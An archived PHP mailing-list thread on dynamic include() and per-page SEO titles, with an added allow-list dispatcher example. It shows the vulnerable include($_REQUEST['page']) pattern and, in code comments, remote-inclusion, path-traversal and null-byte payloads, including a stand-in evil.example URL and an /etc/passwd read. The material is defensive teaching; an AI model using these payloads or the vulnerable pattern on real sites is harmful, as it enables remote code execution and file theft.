Re: questions about using include() in php

Be careful!!

Hacking a dynamic include is one of the easiest ways to break into a site.

If you write something like

<?php
$strPage = $_REQUEST[ "page" ] . ".php" ;
include( $strPage );
?>

you will put your site at serious risk. The user can send something like
"http://www.mysite.com/somethingbad.txt?ignore=" and the content of this txt
file will be executed on your site.
With this "feature", the hacker can easily erase all your files, change or
drop your database files, create a hidden site inside your host, etc. In
fact, he can do anything the Apache user can do on the host
machine.

The tip is: NEVER DO THAT.

To create similar behaviour you would do something like:

<?php
// The request value is only compared against known names; it is never
// used as a file name (and no ".php" is appended, or no case would match).
$strPage = isset( $_REQUEST[ "page" ] ) ? $_REQUEST[ "page" ] : "" ;
switch( $strPage )
{
    case "main":
    {
        require( "main.php" );
        break;
    }
    case "otherpage":
    {
        require( "otherpage.php" );
        break;
    }
    default:
    {
        require( "error.php" );
        break;
    }
}

?>

It is very impressive how many sites have this mistake. One fast search
on Google shows that.

Take care

On Sat, Jul 19, 2008 at 8:49 PM, Joe Forsythe <jforsythe@xxxxxxxxxxxxxxxxxx>
wrote:

>   Hi,
>
> The answer to your question is largely an "it depends" scenario. I would
> need to see the code for the index page to really be clear. From what I can
> tell you want.
>
> There are a few schools of thought on the methods for getting URLs.
> *Supposedly* doing something like "URL/pages/webdevelopment/more_options"
> with http/URL rewriting is better for SEO than, say,
> "URL?page=webdevelopment&moreoptions=foo". True? Kind of hard to say -
> Google's own search engine uses pretty long query strings.
>
> If you're looking to keep the URL structure and file pulls the same, I
> suggest taking the "<head></head>" stuff out of your included header file
> and do dynamic headers/titles that tack on to the output before it is
> spewed
> out to the browser. From what I can tell in your e-mail, that would be the
> easiest thing to do.
>
> So, if your code looks something like this (greatly simplified & no error
> checking):
>
> <?php
>
> $foo = $_GET ['page'].'.html';
>
> include('links.php');
>
> include($foo);
>
> include('footer.php');
>
> ?>
>
> It would magically look like this:
>
> <?php
>
> $foo = $_GET ['page'];
>
> $file_extension = '.html';
>
> switch ($foo) {
> case 'webdevelopment':
>     // include some stuff, echo stuff, etc...
>     break;
> // ...do other case stuff...
> }
>
> include('links.php');
>
> $foo .= $file_extension;
>
> include($foo);
>
> include('footer.php');
>
> ?>
>
> Again, I'd need to see your code to have a better idea here, but I hope
> that
> helps. It's not the most in-depth tutorial, since I'm sure you went through
> the manual.
>
> So, yeah, please feel free to send code. For the index.php file and any
> included files for one HTML page to display. That would probably help keep
> the guess work out of this. Yep. I'd say including code would be awesome.
>
> --
>
> Joe
>
> From: php-objects@xxxxxxxxxxxxxxx <php-objects%40yahoogroups.com> [mailto:
> php-objects@xxxxxxxxxxxxxxx <php-objects%40yahoogroups.com>] On
> Behalf Of Sudhakar
> Sent: Saturday, July 19, 2008 1:50 AM
>
> To: php-objects@xxxxxxxxxxxxxxx <php-objects%40yahoogroups.com>
> Subject:  questions about using include() in php
>
> I am doing SEO for a website and this website uses a lot of PHP, for
> which I need suggestions. This is how the website is set up.
>
> In the index.php file there is a Flash banner at the top of the page,
> the center part is another file which is called using include
> ("links.php"), and the bottom part is included using include("footer.php").
>
> The footer has links such as webdevelopment, software
> development ... each of these has a query string:
> http://website.com/index.php?page=webdevelopment and
> http://website.com/index.php?page=software ... etc.
>
> This way every link in the website is calling index.php and a query
> string is being passed; index.php looks for the name
> (e.g. webdevelopment) and loads that particular page in the center
> section of the website. The main purpose of doing this was to load
> the Flash file only one time, so that when the links
> from the footer are clicked only the center part changes and the
> Flash file does not have to reload.
>
> Due to this the entire website has only one page, index.php,
> and therefore only one <title> tag, one meta description and one meta keywords
> tag, as the values of the <title> and <meta> tags are being displayed from
> index.php.
>
> However, from an SEO and SEM perspective there should ideally be
> different file names, which means I can optimize the <title> and <meta>
> tags for individual files.
>
> Please advise the best solution to get around this, as I would like to
> have different title and meta tags for individual pages like
> webdevelopment.php, software.php etc., which I am presently not able to
> do due to include("").
>
> Any help will be greatly appreciated.
>
> Thanks.
>



-- 
O Blaine - What the developing
/|\ shouldn't have been
| thiagomata.blog.com
/ \
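Worked example, added to this archive page and not code from any message in the thread above. It puts the vulnerable include the first reply warns about beside an allow-list dispatcher of the kind that reply's switch sketches, and lets the same table carry a per-page <title> and meta description, which is what the original question asked for. The page keys, file names, titles, descriptions and the pages/ directory are made up for illustration. One caveat worth knowing when reading the warning: the remote-file variant only works when PHP's allow_url_include (allow_url_fopen on versions before 5.2) is on; with it off, the same code still lets a caller include any local .php file via ../ traversal, and on PHP older than 5.3.4 a %00 byte in the parameter drops the appended ".php" so any local file can be read.

```php
<?php
// Added example, not code from any message in this thread. Page keys,
// file names, titles, descriptions and the pages/ directory are made up.
//
// What the thread warns about, for comparison only (never deploy it):
//
//     $strPage = $_REQUEST['page'] . '.php';
//     include($strPage);
//
// With allow_url_include=On, ?page=http://evil.example/bad.txt?ignore=
// fetches and executes remote code (the appended '.php' lands in the
// remote query string). With it Off, ?page=../../other/admin still
// includes any local .php file, and on PHP < 5.3.4 ?page=../../etc/passwd%00
// drops the suffix and reads arbitrary local files.

// Allow-list: the client-supplied value is only ever a KEY into this
// table. The file name comes from the table, never from the request, and
// the same table supplies a per-page <title> and meta description.
const PAGES = [
    'main' => [
        'file'        => 'main.php',
        'title'       => 'Home',
        'description' => 'Company home page',
    ],
    'webdevelopment' => [
        'file'        => 'webdevelopment.php',
        'title'       => 'Web Development',
        'description' => 'Custom web development services',
    ],
    'software' => [
        'file'        => 'software.php',
        'title'       => 'Software Development',
        'description' => 'Bespoke software development',
    ],
    'error' => [
        'file'        => 'error.php',
        'title'       => 'Page not found',
        'description' => 'The requested page does not exist',
    ],
];

/**
 * Map the raw request parameter to an allow-listed page.
 * Returns [entry, HTTP status]; anything not in the table (and a direct
 * request for 'error') gets the error page and a 404, like the
 * switch/default in the thread.
 */
function resolve_page($requested)
{
    if (is_string($requested) && $requested !== 'error'
        && array_key_exists($requested, PAGES)) {
        return [PAGES[$requested], 200];
    }
    return [PAGES['error'], 404];
}

// $_GET rather than $_REQUEST: $_REQUEST also merges POST and cookies.
list($page, $status) = resolve_page(isset($_GET['page']) ? $_GET['page'] : 'main');

// Defence in depth: confirm the table's file really sits under pages/,
// so a bad edit to the table can never point include() outside it.
$pagesDir = realpath(__DIR__ . '/pages');
$path     = ($pagesDir === false) ? false : realpath($pagesDir . '/' . $page['file']);
if ($path === false || strpos($path, $pagesDir . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(500);
    exit('page table misconfigured');
}

http_response_code($status);
?>
<!DOCTYPE html>
<html>
<head>
  <title><?php echo htmlspecialchars($page['title'], ENT_QUOTES, 'UTF-8'); ?></title>
  <meta name="description"
        content="<?php echo htmlspecialchars($page['description'], ENT_QUOTES, 'UTF-8'); ?>">
</head>
<body>
<?php
include __DIR__ . '/links.php';
include $path;                 // always a file named by PAGES, never by the client
include __DIR__ . '/footer.php';
?>
</body>
</html>
```

If the site later moves to rewritten URLs such as /pages/webdevelopment, the rewrite rule simply maps the path segment onto the same ?page= key, so the allow-list stays the single place that decides which file is included. Adding a page means adding one table entry with its file, title and description; nothing the client sends ever reaches include().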

